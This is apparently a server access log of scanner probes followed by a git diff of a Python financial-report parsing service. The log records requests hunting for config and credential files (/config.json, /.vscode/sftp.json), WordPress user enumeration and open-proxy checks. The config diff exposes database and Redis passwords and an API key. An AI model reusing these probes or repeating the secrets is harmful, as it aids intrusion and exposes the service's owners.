INFO: 138.197.191.87:36252 - "GET /config.json HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:36262 - "GET /telescope/requests HTTP/1.1" 404 Not Found
|
||||
INFO: 138.197.191.87:36272 - "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 1.92.159.135:44049 - "HEAD /config.json HTTP/1.1" 404 Not Found
|
||||
INFO: 1.92.159.135:35640 - "GET /config.json HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 1.94.195.230:31877 - "HEAD /.vscode/sftp.json HTTP/1.1" 404 Not Found
|
||||
INFO: 1.94.195.230:18422 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
|
||||
INFO: 42.63.124.88:16626 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 1.83.125.97:13483 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 183.160.194.117:4463 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 45.207.223.44:53774 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53788 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53802 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53812 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53824 - "GET /login.rsp HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:51720 - "GET /nobody/favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:51724 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:38120 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:38128 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:38138 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:52270 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:52280 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:52286 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:52296 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:37634 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:37636 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:37638 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53680 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53686 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53692 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:53696 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:48892 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:48900 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:48904 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:48914 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:47014 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:47016 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:47026 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:47034 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:38420 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:56652 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:56662 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.207.223.44:42704 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 123.249.105.139:30528 - "HEAD /image/lgbg.jpg HTTP/1.1" 404 Not Found
|
||||
INFO: 123.249.105.139:62486 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 124.70.63.89:27278 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.63.89:62601 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 1.92.159.135:25603 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 1.92.159.135:39062 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 119.23.241.9:39090 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 119.23.241.9:39118 - "GET /lang/CN.txt HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 172.169.4.170:54810 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:38808 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 162.142.125.194:53228 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 162.142.125.194:53238 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 173.230.135.6:49676 - "GET / HTTP/1.0" 404 Not Found
|
||||
INFO: 135.148.63.215:40035 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 51.81.181.175:37407 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.156.89:59349 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.88:55637 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.85:58053 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.87:5115 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 87.236.176.226:49403 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:54802 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.197.168:52085 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.178:24179 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.179:52289 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.169:64257 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.216.140.186:60346 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
|
||||
INFO: 167.94.138.34:46446 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 167.94.138.34:46456 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.191.126.248:37700 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 134.209.10.97:46074 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 223.113.128.164:47694 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 70.39.75.167:49148 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.106:20829 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.107:28619 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.107:43499 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.97:12331 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 52.80.18.29:48530 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 52.80.18.29:48546 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 52.80.18.29:48570 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
|
||||
INFO: 52.80.18.29:48554 - "GET /robots.txt HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 124.70.57.132:34056 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.57.132:22282 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 39.105.169.144:41754 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 39.105.169.144:43626 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:59862 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.69:33260 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.69:48986 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.69:49002 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.69:49010 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 13.64.109.8:36270 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 120.46.90.142:45574 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 120.46.90.142:23709 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 124.70.25.74:13545 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.25.74:28683 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.25.74:28683 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.40:35806 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.40:35818 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 185.226.197.63:57255 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.226.197.63:34425 - "GET /console HTTP/1.1" 404 Not Found
|
||||
INFO: 185.226.197.64:37409 - "GET /showLogin.cc HTTP/1.1" 404 Not Found
|
||||
INFO: 87.236.176.94:57835 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 18.144.4.34:39516 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.216.140.186:33568 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
|
||||
INFO: 106.75.188.200:37598 - "POST /token HTTP/1.1" 404 Not Found
|
||||
INFO: 157.245.69.67:34548 - "GET /aaa9 HTTP/1.1" 404 Not Found
|
||||
INFO: 157.245.69.67:34552 - "GET /aab8 HTTP/1.1" 404 Not Found
|
||||
INFO: 157.245.69.67:42104 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 89.248.172.41:56854 - "HEAD /playlist.m3u HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.66:13626 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.66:15908 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.66:15922 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 65.49.20.66:15926 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 103.203.58.4:41010 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 80.82.77.139:49396 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 80.82.77.139:50230 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:40242 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 70.39.75.159:34126 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:59652 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 206.168.34.220:36530 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 206.168.34.220:36552 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 1.94.195.230:25149 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 1.94.195.230:35249 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 34.140.231.8:38328 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 143.244.133.204:60510 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 36.111.151.242:59402 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 36.111.151.242:58560 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 36.111.151.242:58564 - "GET /robots.txt HTTP/1.1" 404 Not Found
|
||||
INFO: 36.111.151.242:58578 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.90.23:39065 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.156.111:30617 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.111:35591 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.118:17357 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.156.113:56373 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 123.160.223.74:33085 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 167.71.11.105:49012 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 185.191.126.248:36288 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 167.94.138.163:46744 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 167.94.138.163:46748 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 18.199.93.83:51354 - "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 172.169.6.55:42302 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.69:28842 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.69:37052 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.69:37082 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 184.105.139.69:9770 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 208.87.243.131:57870 - "GET http%3A//azenv.net/ HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 124.70.63.89:62210 - "HEAD / HTTP/1.1" 404 Not Found
|
||||
INFO: 124.70.63.89:13433 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 87.236.176.32:54413 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 64.62.197.172:16101 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.176:47069 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.170:61969 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
|
||||
INFO: 64.62.197.167:61305 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
|
||||
INFO: 170.64.134.89:39188 - "GET /aaa9 HTTP/1.1" 404 Not Found
|
||||
INFO: 170.64.134.89:39204 - "GET /aab8 HTTP/1.1" 404 Not Found
|
||||
INFO: 170.64.134.89:39206 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 154.212.141.171:53736 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 118.26.39.17:57178 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 118.26.39.17:57214 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
||||
INFO: 167.94.138.175:45612 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 167.94.138.175:45628 - "PRI %2A HTTP/2.0" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 178.32.170.30:38143 - "GET / HTTP/1.1" 404 Not Found
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
WARNING: Invalid HTTP request received.
|
||||
INFO: 45.83.65.202:56736 - "GET / HTTP/1.1" 404 Not Found
|
||||
INFO: 45.83.66.235:14182 - "GET /favicon.ico HTTP/1.1" 404 Not Found
|
|
@ -3,7 +3,6 @@ from pydantic import BaseModel
|
|||
import os
|
||||
import utils
|
||||
import queue
|
||||
import multiprocessing
|
||||
from multiprocessing import Process
|
||||
import word_title
|
||||
import time
|
||||
|
@ -85,7 +84,7 @@ def run_job():
|
|||
p = Process(target=main_word.process_table, args=(file_id, job_info,))
|
||||
processes.append(p)
|
||||
p.start()
|
||||
applog.info(f'等待所有子任务完成,任务ID:{file_id}')
|
||||
applog.info(f'等待所有子任务完成,任务ID:{file_id}' )
|
||||
for p in processes:
|
||||
p.join()
|
||||
|
||||
|
@ -213,14 +212,14 @@ app.post("/parser/start",
|
|||
# 运行 FastAPI 应用
|
||||
if __name__ == "__main__":
|
||||
# 服务器启动服务
|
||||
# import uvicorn
|
||||
#
|
||||
# uvicorn.run(app, host="0.0.0.0", port=config.PORT)
|
||||
import uvicorn
|
||||
|
||||
uvicorn.run(app, host="0.0.0.0", port=config.PORT)
|
||||
# 本地调试任务
|
||||
file_id = "201917"
|
||||
job_queue.put({
|
||||
'file_path': '1.docx',
|
||||
'file_id': file_id,
|
||||
})
|
||||
db_service_word.delete_database(file_id)
|
||||
run_job()
|
||||
# file_id = "201837"
|
||||
# job_queue.put({
|
||||
# 'file_path': '西部建设.docx',
|
||||
# 'file_id': file_id,
|
||||
# })
|
||||
# db_service_word.delete_database(file_id)
|
||||
# run_job()
|
||||
|
|
|
@ -1,33 +1,23 @@
|
|||
MILVUS_CLIENT='http://124.70.129.232:19530'
|
||||
#MILVUS_CLIENT='http://60.204.228.154:19530'
|
||||
MYSQL_HOST = '121.37.185.246'
|
||||
MILVUS_CLIENT='http://127.0.0.1:19530'
|
||||
MILVUS_HOST = '127.0.0.1'
|
||||
MILVUS_PORT = 19530
|
||||
MYSQL_HOST = '10.127.2.207'
|
||||
MYSQL_PORT = 3306
|
||||
MYSQL_USER = 'financial'
|
||||
MYSQL_PASSWORD = 'financial_8000'
|
||||
MYSQL_DB = 'financial_report'
|
||||
|
||||
# NOTIFY_ADDR = 'http://192.168.0.175:8100/api/tenant/report/notify'
|
||||
|
||||
|
||||
NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
|
||||
|
||||
# REDIS_HOST = '127.0.0.1'
|
||||
REDIS_HOST = '123.60.153.169'
|
||||
MYSQL_USER = 'financial_prod'
|
||||
MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
|
||||
MYSQL_DB = 'financial_report_prod'
|
||||
NOTIFY_ADDR = 'http://10.127.2.202:8100/api/tenant/report/notify'
|
||||
FILE_PATH = '/root/pdf_parser/word/'
|
||||
REDIS_HOST = '10.127.2.209'
|
||||
REDIS_PORT = 6379
|
||||
REDIS_PASSWORD = 'Xgf_redis'
|
||||
FILE_PATH = '/root/word_parser/word/'
|
||||
REDIS_PASSWORD = 'dMrt4kmwiW6LDJXy'
|
||||
PORT = 8001
|
||||
MEASURE_COUNT = 8
|
||||
|
||||
# MYSQL_HOST_APP = '192.168.0.201'#192.168.0.201
|
||||
# MYSQL_PORT_APP = 3306
|
||||
# MYSQL_USER_APP = 'root'
|
||||
# MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
|
||||
# MYSQL_DB_APP = 'financial_report_prod'
|
||||
|
||||
|
||||
MYSQL_HOST_APP = '121.37.185.246'#192.168.0.201
|
||||
MYSQL_HOST_APP = '10.127.2.207'
|
||||
MYSQL_PORT_APP = 3306
|
||||
MYSQL_USER_APP = 'financial'
|
||||
MYSQL_PASSWORD_APP = 'financial_8000'
|
||||
MYSQL_DB_APP = 'financial_report'
|
||||
MYSQL_USER_APP = 'financial_prod'
|
||||
MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
|
||||
MYSQL_DB_APP = 'financial_report_prod'
|
||||
api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
|
||||
|
|
|
@ -154,9 +154,9 @@ if __name__ == "__main__":
|
|||
)
|
||||
cursor = conn.cursor()
|
||||
|
||||
# measure_config_to_db(conn,cursor)
|
||||
measure_config_to_db(conn,cursor)
|
||||
|
||||
insert_measure_vector(conn,cursor)
|
||||
# insert_measure_vector(conn,cursor)
|
||||
|
||||
# cursor.close()
|
||||
# conn.close()
|
||||
|
|
|
@ -208,6 +208,17 @@ def update_ori_measure(conn,cursor,file_id):
|
|||
and t1.file_id = '{file_id}'
|
||||
and t2.year = '{year}'
|
||||
'''.format(file_id=file_id, year=report_year)
|
||||
|
||||
select_query_first_quarter = '''
|
||||
SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
|
||||
FROM ori_measure_list t1
|
||||
left join
|
||||
measure_config_first_quarter t2
|
||||
on t1.ori_measure_id = t2.ori_measure_id
|
||||
where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
|
||||
and t1.file_id = '{file_id}'
|
||||
and t2.year = '{year}'
|
||||
'''.format(file_id=file_id, year=report_year)
|
||||
|
||||
if report_type == 1:
|
||||
start_time = time.time()
|
||||
|
@ -216,6 +227,13 @@ def update_ori_measure(conn,cursor,file_id):
|
|||
end_time = time.time()
|
||||
applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
applog.info(f'update_ori_measure方法走的是半年报')
|
||||
elif report_type == 2:
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_first_quarter)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
applog.info(f'update_ori_measure方法走的是一季报')
|
||||
elif report_type == 3:
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_thrid)
|
||||
|
@ -243,6 +261,9 @@ def update_ori_measure(conn,cursor,file_id):
|
|||
|
||||
if report_type == 0:
|
||||
table_name = "measure_config"
|
||||
elif report_type == 2:
|
||||
table_name = "measure_config_first_quarter"
|
||||
|
||||
elif report_type == 3:
|
||||
table_name = "measure_config_third_quarter"
|
||||
else:
|
||||
|
@ -342,7 +363,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
measure_index_records = cursor_app.fetchall()
|
||||
for measure_index_record in measure_index_records:
|
||||
measure_index_array.append(measure_index_record[0])
|
||||
|
||||
|
||||
if str(report_type) == "2":
|
||||
table_index_array = []
|
||||
measure_index_array = []
|
||||
|
||||
applog.info(f'黑名单的值是{parent_table_pages}和{table_index_array}以及新增的{measure_index_array}')
|
||||
applog.info(f"black_array:{black_array}")
|
||||
|
||||
record_start = record_range.split('-')[0]
|
||||
record_end = record_range.split('-')[1]
|
||||
|
@ -368,6 +396,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
output_fields=["measure_name","measure_value","table_num","table_index","measure_unit"],
|
||||
filter=filter_str
|
||||
)
|
||||
|
||||
|
||||
|
||||
# Convert the output to a formatted JSON string
|
||||
# for i in range(len(res[0])):
|
||||
|
@ -387,16 +417,18 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
#过滤表格上方文字黑名单关键词的页码和表格下标
|
||||
if f"{table_num}" in table_index_array:
|
||||
continue
|
||||
|
||||
|
||||
|
||||
|
||||
#过滤指标中包含黑名单关键词
|
||||
if utils.check_pdf_measure_black_list(pdf_measure):
|
||||
continue
|
||||
|
||||
if f"{table_num}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
|
||||
#if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
|
||||
applog.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
|
||||
continue
|
||||
|
||||
|
||||
|
||||
if vector_distance > distance and table_num not in parent_table_pages:
|
||||
#检测规则开始
|
||||
#判断抽取指标和财报指标周期是否相同
|
||||
|
@ -406,7 +438,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
applog.info(f'第1处{ori_period}和{pdf_period}')
|
||||
if(ori_period != pdf_period):
|
||||
continue
|
||||
|
||||
|
||||
|
||||
#判断抽取指标和财报指标是否期初指标
|
||||
start_ori_period = utils.get_start_period_type(ori_measure_name)
|
||||
start_pdf_period = utils.get_start_period_type(pdf_measure)
|
||||
|
@ -422,6 +455,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
applog.info(f'第3处{ori_season_type}和{pdf_season_type}')
|
||||
if(ori_season_type != pdf_season_type):
|
||||
continue
|
||||
|
||||
|
||||
#判断是否都是扣非指标
|
||||
ori_kf_type = utils.get_kf_flag(ori_measure_name)
|
||||
|
@ -429,8 +463,9 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
applog.info(f'第4处{ori_kf_type}和{pdf_kf_type}')
|
||||
if(ori_kf_type != pdf_kf_type):
|
||||
applog.info(f'扣非指标{table_num}页的{pdf_measure}指标')
|
||||
continue
|
||||
|
||||
|
||||
#判断抽取指标和财报指标类型是否相同,是否都是百分比
|
||||
ori_type = utils.get_percent_flag(ori_measure_name)
|
||||
pdf_type = utils.get_percent_flag(pdf_measure)
|
||||
|
@ -459,12 +494,13 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
check_records = cursor.fetchall()
|
||||
if(len(check_records)) > 0:
|
||||
continue
|
||||
|
||||
|
||||
#判断是否包含黑名单
|
||||
if(utils.check_black_list(measure_name,pdf_measure,black_array)):
|
||||
continue
|
||||
|
||||
|
||||
if(utils.check_white_list(measure_name,pdf_measure)):
|
||||
applog.info(f"measure_name{measure_name},pdf_measure{pdf_measure}")
|
||||
continue
|
||||
|
||||
#判断抽取指标和财报指标类型是否都是增长类,比如同比变动为增长类
|
||||
|
@ -483,7 +519,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
|
||||
if(ori_report_start != pdf_report_start):
|
||||
continue
|
||||
|
||||
|
||||
#检测规则结束
|
||||
#获取指标单位数据,除了百分比
|
||||
if(utils.get_percent_flag(measure_name) == '0'):
|
||||
|
@ -496,7 +532,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
unit = unit_records[0][0]
|
||||
else:
|
||||
unit = '元'
|
||||
|
||||
|
||||
data_to_insert = (file_id, file_name, "table", int(table_num), int(table_index), ori_measure_id, ori_measure_name, measure_value, create_time, create_time, vector_distance, pdf_measure,measure_id,measure_name,unit)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
|
@ -508,6 +544,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
conn.close()
|
||||
client.close()
|
||||
|
||||
#
|
||||
def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_name):
|
||||
select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
|
||||
cursor.execute(select_year_select)
|
||||
|
